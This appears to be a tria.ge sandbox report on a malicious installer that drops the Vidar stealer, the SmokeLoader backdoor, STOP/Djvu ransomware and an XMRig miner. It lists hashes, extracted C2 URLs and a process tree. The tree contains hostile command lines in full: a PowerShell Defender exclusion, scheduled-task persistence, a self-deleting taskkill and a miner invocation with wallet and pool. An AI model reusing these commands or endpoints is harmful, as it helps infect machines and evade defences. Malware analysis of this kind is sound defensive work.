Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
07/09/2021, 17:26
210907-vzzaxsdae6 1007/09/2021, 13:18
210907-qkaa2acfe3 1006/09/2021, 17:52
210906-wfz9jsbch4 1006/09/2021, 17:51
210906-wfnwhsbch3 1006/09/2021, 13:27
210906-qp3hdaedaj 1006/09/2021, 09:28
210906-lfpgyaeael 1006/09/2021, 04:33
210906-e6mmpsaaa2 1005/09/2021, 05:25
210905-f4h26sfab6 1004/09/2021, 21:32
210904-1dqdsahfdj 1004/09/2021, 21:19
210904-z56z6shfck 10Analysis
-
max time kernel
16s -
max time network
466s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
06/09/2021, 17:51
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
Errors
General
-
Target
setup_x86_x64_install.exe
-
Size
2.2MB
-
MD5
e3b3a95ef03de0de77cca7a54ea22c94
-
SHA1
d318d234f8f27f25de660d9881113df9d11c24ff
-
SHA256
baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
-
SHA512
3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d
Malware Config
Extracted
vidar
40.4
706
https://romkaxarit.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2860 2252 rundll32.exe 61 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral3/memory/936-152-0x0000000000400000-0x00000000021BE000-memory.dmp family_vidar -
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral3/memory/1372-327-0x00000001402F327C-mapping.dmp xmrig behavioral3/memory/1372-340-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
resource yara_rule behavioral3/files/0x00030000000130f4-76.dat aspack_v212_v242 behavioral3/files/0x00030000000130f4-77.dat aspack_v212_v242 behavioral3/files/0x00030000000130f2-78.dat aspack_v212_v242 behavioral3/files/0x00030000000130f2-79.dat aspack_v212_v242 behavioral3/files/0x0003000000013108-82.dat aspack_v212_v242 behavioral3/files/0x0003000000013108-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 1976 setup_installer.exe 568 setup_install.exe 936 Fri1544861ac3fe6a.exe 1188 Fri155442fc38b.exe 1104 Fri1553f0ee90.exe 792 Fri157e25afd971.exe 1068 Fri157e25afd971.tmp -
Loads dropped DLL 28 IoCs
pid Process 1812 setup_x86_x64_install.exe 1976 setup_installer.exe 1976 setup_installer.exe 1976 setup_installer.exe 1976 setup_installer.exe 1976 setup_installer.exe 1976 setup_installer.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 568 setup_install.exe 1232 cmd.exe 1232 cmd.exe 1592 cmd.exe 928 cmd.exe 936 Fri1544861ac3fe6a.exe 936 Fri1544861ac3fe6a.exe 1676 cmd.exe 792 Fri157e25afd971.exe 792 Fri157e25afd971.exe 792 Fri157e25afd971.exe 1068 Fri157e25afd971.tmp 1068 Fri157e25afd971.tmp 1068 Fri157e25afd971.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1612 icacls.exe -
resource yara_rule behavioral3/memory/1556-216-0x0000000000290000-0x0000000000291000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 174 api.2ip.ua 46 ip-api.com 157 api.2ip.ua 158 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2148 1628 WerFault.exe 52 2612 936 WerFault.exe 37 1704 2184 WerFault.exe 59 2488 368 WerFault.exe 47 2316 2432 WerFault.exe 66 3664 3216 WerFault.exe 128 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1340 schtasks.exe 1968 schtasks.exe 3172 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 2900 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1104 Fri1553f0ee90.exe Token: SeDebugPrivilege 1188 Fri155442fc38b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1812 wrote to memory of 1976 1812 setup_x86_x64_install.exe 26 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 1976 wrote to memory of 568 1976 setup_installer.exe 27 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1456 568 setup_install.exe 29 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1232 568 setup_install.exe 31 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1376 568 setup_install.exe 30 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1676 568 setup_install.exe 32 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 1592 568 setup_install.exe 34 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 608 568 setup_install.exe 33 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 1820 568 setup_install.exe 36 PID 568 wrote to memory of 928 568 setup_install.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B781615\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe4⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe4⤵
- Loads dropped DLL
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri1544861ac3fe6a.exeFri1544861ac3fe6a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 10366⤵
- Program crash
PID:2612
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri157e25afd971.exe4⤵
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri157e25afd971.exeFri157e25afd971.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:792 -
C:\Users\Admin\AppData\Local\Temp\is-BCG39.tmp\Fri157e25afd971.tmp"C:\Users\Admin\AppData\Local\Temp\is-BCG39.tmp\Fri157e25afd971.tmp" /SL5="$4012C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri157e25afd971.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\is-GOB50.tmp\zab2our.exe"C:\Users\Admin\AppData\Local\Temp\is-GOB50.tmp\zab2our.exe" /S /UID=burnerch27⤵PID:1936
-
C:\Program Files\Windows Portable Devices\NOXFRSSDIN\ultramediaburner.exe"C:\Program Files\Windows Portable Devices\NOXFRSSDIN\ultramediaburner.exe" /VERYSILENT8⤵PID:2004
-
C:\Users\Admin\AppData\Local\Temp\is-ITBCN.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-ITBCN.tmp\ultramediaburner.tmp" /SL5="$40252,281924,62464,C:\Program Files\Windows Portable Devices\NOXFRSSDIN\ultramediaburner.exe" /VERYSILENT9⤵PID:2076
-
-
-
C:\Users\Admin\AppData\Local\Temp\56-aae89-d38-a4fbc-a3214e3608537\Nagymaesona.exe"C:\Users\Admin\AppData\Local\Temp\56-aae89-d38-a4fbc-a3214e3608537\Nagymaesona.exe"8⤵PID:1856
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:2936
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:275457 /prefetch:210⤵PID:2200
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:406543 /prefetch:210⤵PID:1944
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:2160
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:210⤵PID:3588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\17-09ef4-012-ed190-eaef4507b3f69\Vyzhybytexa.exe"C:\Users\Admin\AppData\Local\Temp\17-09ef4-012-ed190-eaef4507b3f69\Vyzhybytexa.exe"8⤵PID:2684
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe4⤵PID:608
-
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri15af75ee9b.exeFri15af75ee9b.exe5⤵PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri155442fc38b.exe4⤵
- Loads dropped DLL
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri155442fc38b.exeFri155442fc38b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1188 -
C:\Users\Admin\AppData\Roaming\5776050.exe"C:\Users\Admin\AppData\Roaming\5776050.exe"6⤵PID:368
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 368 -s 12687⤵
- Program crash
PID:2488
-
-
-
C:\Users\Admin\AppData\Roaming\4082493.exe"C:\Users\Admin\AppData\Roaming\4082493.exe"6⤵PID:1972
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2340
-
-
-
C:\Users\Admin\AppData\Roaming\5127298.exe"C:\Users\Admin\AppData\Roaming\5127298.exe"6⤵PID:1556
-
-
C:\Users\Admin\AppData\Roaming\4983577.exe"C:\Users\Admin\AppData\Roaming\4983577.exe"6⤵PID:2432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 17607⤵
- Program crash
PID:2316
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe4⤵
- Loads dropped DLL
PID:928 -
C:\Users\Admin\AppData\Local\Temp\7zS8B781615\Fri1553f0ee90.exeFri1553f0ee90.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:1760
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:976
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2816
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1340
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2896
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1156
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:1968
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2876
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:1372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:1840
-
C:\Users\Admin\AppData\Roaming\2045531.exe"C:\Users\Admin\AppData\Roaming\2045531.exe"8⤵PID:2184
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2184 -s 17369⤵
- Program crash
PID:1704
-
-
-
C:\Users\Admin\AppData\Roaming\6764081.exe"C:\Users\Admin\AppData\Roaming\6764081.exe"8⤵PID:2328
-
-
C:\Users\Admin\AppData\Roaming\8928184.exe"C:\Users\Admin\AppData\Roaming\8928184.exe"8⤵PID:1712
-
-
C:\Users\Admin\AppData\Roaming\5744697.exe"C:\Users\Admin\AppData\Roaming\5744697.exe"8⤵PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:1628
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1628 -s 13928⤵
- Program crash
PID:2148
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3048
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:2900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"7⤵PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2648
-
C:\Users\Admin\AppData\Local\Temp\is-PL04D.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-PL04D.tmp\setup_2.tmp" /SL5="$1017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\is-9LQ1K.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-9LQ1K.tmp\setup_2.tmp" /SL5="$3017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:3028
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2980
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2124
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME7.exe4⤵PID:1820
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:2996
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2860
-
C:\Users\Admin\AppData\Local\Temp\C7A3.exeC:\Users\Admin\AppData\Local\Temp\C7A3.exe1⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\D1C.exeC:\Users\Admin\AppData\Local\Temp\D1C.exe1⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\5737.exeC:\Users\Admin\AppData\Local\Temp\5737.exe1⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\5737.exeC:\Users\Admin\AppData\Local\Temp\5737.exe2⤵PID:3016
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\285e6808-3460-4c84-b60e-e8bd73ca2cb6" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:1612
-
-
C:\Users\Admin\AppData\Local\Temp\5737.exe"C:\Users\Admin\AppData\Local\Temp\5737.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\5737.exe"C:\Users\Admin\AppData\Local\Temp\5737.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:2856
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"5⤵PID:3076
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build2.exe"6⤵PID:3216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3216 -s 4127⤵
- Program crash
PID:3664
-
-
-
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"5⤵PID:3084
-
C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"C:\Users\Admin\AppData\Local\29835459-6191-48e5-a3b9-69d635590285\build3.exe"6⤵PID:3140
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:3172
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B455.exeC:\Users\Admin\AppData\Local\Temp\B455.exe1⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\FD28.exeC:\Users\Admin\AppData\Local\Temp\FD28.exe1⤵PID:2228